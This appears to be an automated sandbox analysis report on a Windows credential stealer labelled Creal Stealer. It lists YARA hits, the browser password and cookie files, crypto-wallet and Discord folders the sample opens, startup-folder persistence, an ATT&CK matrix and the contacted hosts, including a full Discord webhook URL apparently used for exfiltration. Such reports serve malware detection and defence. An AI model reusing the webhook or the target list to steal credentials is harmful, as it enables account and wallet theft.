Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\base_library.zip VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe

Code function: 0_2_00007FF78F48C460 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF78F48C460

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe

Code function: 0_2_00007FF78F4A6370 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF78F4A6370

Stealing of Sensitive Information

Yara detected Creal Stealer

Source: Yara match	File source: 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2012652158.000001F3E3C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1959532011.000001F3E36D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1958967533.000001F3E36A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1958731140.000001F3E3403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1783767443.000002539B464000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1959293524.000001F3E36B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1958528378.000001F3E363E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1783368757.000002539B404000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HyZh4pn0RF.exe PID: 4040, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior

Tries to steal communication platform credentials (via file / registry access)

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Local\Discord	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Local\DiscordCanary	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Local\DiscordPTB	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Local\DiscordDevelopment	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Local\Discord	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Local\DiscordCanary	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Local\DiscordPTB	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	File opened: C:\Users\user\AppData\Local\DiscordDevelopment	Jump to behavior

Remote Access Functionality

Yara detected Creal Stealer

Source: Yara match	File source: 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2012652158.000001F3E3C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1959532011.000001F3E36D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1958967533.000001F3E36A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1958731140.000001F3E3403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1783767443.000002539B464000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1959293524.000001F3E36B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1958528378.000001F3E363E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1783368757.000002539B404000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HyZh4pn0RF.exe PID: 4040, type: MEMORYSTR

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB796B74 PyFloat_Type,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyObject_CheckBuffer,PyErr_Format,sqlite3_bind_null,PyObject_GetBuffer,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,sqlite3_bind_blob,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyFloat_AsDouble,PyErr_Occurred,sqlite3_bind_double,PyErr_Occurred,sqlite3_bind_int64,	10_2_00007FFBBB796B74
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB794EC0 PyEval_SaveThread,sqlite3_bind_parameter_count,PyEval_RestoreThread,PyTuple_Type,sqlite3_bind_parameter_name,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyLong_AsLongLongAndOverflow,sqlite3_bind_int64,_Py_Dealloc,PyUnicode_AsUTF8AndSize,sqlite3_bind_text,PyTuple_Pack,PyDict_GetItemWithError,_Py_Dealloc,PyErr_Occurred,_PyObject_LookupAttr,_PyObject_LookupAttr,PyLong_Type,PyFloat_Type,PyUnicode_Type,PyType_IsSubtype,PyObject_CheckBuffer,PyObject_GetBuffer,sqlite3_bind_blob,PyBuffer_Release,sqlite3_bind_null,PyFloat_AsDouble,sqlite3_bind_double,PyEval_SaveThread,sqlite3_bind_parameter_name,PyEval_RestoreThread,PyUnicode_FromString,PyDict_Type,PyDict_GetItemWithError,_Py_Dealloc,PyErr_GetRaisedException,sqlite3_db_handle,_PyErr_ChainExceptions1,PyExc_DeprecationWarning,PyErr_WarnFormat,PyList_GetItem,PyObject_CallOneArg,PyErr_Occurred,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,PyErr_Format,PyObject_CallOneArg,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,PySequence_Check,PyTuple_Type,PyErr_GetRaisedException,sqlite3_db_handle,_PyErr_ChainExceptions1,PySequence_Size,PyErr_Format,PyObject_GetItem,PyErr_Occurred,PyErr_Format,PyErr_Format,PyErr_SetString,PySequence_GetItem,_Py_Dealloc,_Py_Dealloc,_Py_Dealloc,PyExc_LookupError,PyErr_ExceptionMatches,_Py_Dealloc,PyObject_CallOneArg,_Py_Dealloc,_Py_Dealloc,PyExc_TypeError,PyErr_ExceptionMatches,PyErr_Clear,_Py_Dealloc,PyExc_OverflowError,PyErr_SetString,PyBuffer_Release,PyExc_OverflowError,PyErr_SetString,PyErr_Occurred,	10_2_00007FFBBB794EC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB7950DD PyLong_AsLongLongAndOverflow,sqlite3_bind_int64,PyTuple_Pack,PyDict_GetItemWithError,_Py_Dealloc,PyErr_Occurred,_PyObject_LookupAttr,_PyObject_LookupAttr,PyLong_Type,PyFloat_Type,PyUnicode_Type,	10_2_00007FFBBB7950DD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB7F2A8C bind,WSAGetLastError,_Py_NoneStruct,PyExc_ValueError,PyErr_SetString,	10_2_00007FFBBB7F2A8C

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	12 Registry Run Keys / Startup Folder	11 Process Injection	1 Masquerading	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Email Collection	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	12 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	15 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	24 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
HyZh4pn0RF.exe	50%	ReversingLabs	Win64.Trojan.CrealStealer
HyZh4pn0RF.exe	100%	Avira	TR/PSW.Agent.mpcdf
HyZh4pn0RF.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_ARC4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_Salsa20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_chacha20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_pkcs1_decode.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_aes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_aesni.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_arc2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_blowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cast.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cbc.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cfb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ctr.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_des.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_des3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ecb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_eksblowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ocb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ofb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_BLAKE2b.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_BLAKE2s.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD5.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_RIPEMD160.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA1.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA224.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA256.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA384.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA512.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_ghash_clmul.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_ghash_portable.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_keccak.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_poly1305.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Math\_modexp.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Protocol\_scrypt.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ec_ws.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ed25519.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ed448.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_x25519.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Util\_cpuid_c.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Util\_strxor.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\VCRUNTIME140_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\_asyncio.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\_cffi_backend.cp312-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\_multiprocessing.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\_overlapped.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\_uuid.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\_wmi.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\charset_normalizer\md.cp312-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\charset_normalizer\md__mypyc.cp312-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\pyexpat.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\python312.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\pywin32_system32\pywintypes312.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI3442\win32\win32api.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_ARC4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_Salsa20.pyd	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://api.ipify.org/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
discord.com	162.159.136.232	true	true	unknown
api.ipify.org	172.67.74.152	true	false	unknown
geolocation-db.com	159.89.102.253	true	true	unknown
api.gofile.io	45.112.123.126	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://discord.com/api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R	true		unknown
https://api.ipify.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://discord.gift/	HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages	HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmp	false	unknown
https://coinbase.com)	HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	false	unknown
https://discord.com)z	HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://tiktok.com)	HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	false	unknown
https://ebay.com)z$	HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://docs.python.org/library/unittest.html	HyZh4pn0RF.exe, 00000002.00000002.1822533941.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1805597702.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1498180126.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1500555282.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1787795082.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1789691864.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1795287489.000002539A7F4000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://discord.com)	HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	false	unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	HyZh4pn0RF.exe, 00000002.00000002.1818704993.00000253983FF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1816780599.00000253983FF000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1813931845.00000253983FE000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1789605156.00000253983F5000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://packaging.python.org/en/latest/specifications/core-metadata/	HyZh4pn0RF.exe, 00000002.00000002.1823958561.000002539ACF0000.00000004.00001000.00020000.00000000.sdmp	false	unknown
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	HyZh4pn0RF.exe, 00000002.00000003.1491805697.000002539A3D5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1793303262.000002539A3DD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788862603.000002539A3A4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1493432472.000002539A3D0000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1494266364.000002539A336000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788235967.000002539A2D4000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1494465434.000002539A392000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1790103376.000002539A3AD000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1788053282.000002539A2D2000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1791704398.000002539A3BF000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://paypal.com)	HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	false	unknown
https://github.com/pypa/packaging	HyZh4pn0RF.exe, 00000002.00000002.1823609373.000002539AAF0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1493090352.000002539A661000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://refspecs.linuxfoundation.org/elf/gabi4	HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1823609373.000002539AAF0000.00000004.00001000.00020000.00000000.sdmp	false	unknown
https://discord.com/api/v9/users/	HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://xbox.com)	HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://youtube.com)	HyZh4pn0RF.exe, 00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	false	unknown
https://twitch.com)z	HyZh4pn0RF.exe, 00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1796923552.000002539B1F2000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://t.me/CrealStealer	HyZh4pn0RF.exe, 00000002.00000003.1784174727.000002539B471000.00000004.00000020.00020000.00000000.sdmp	false	unknown
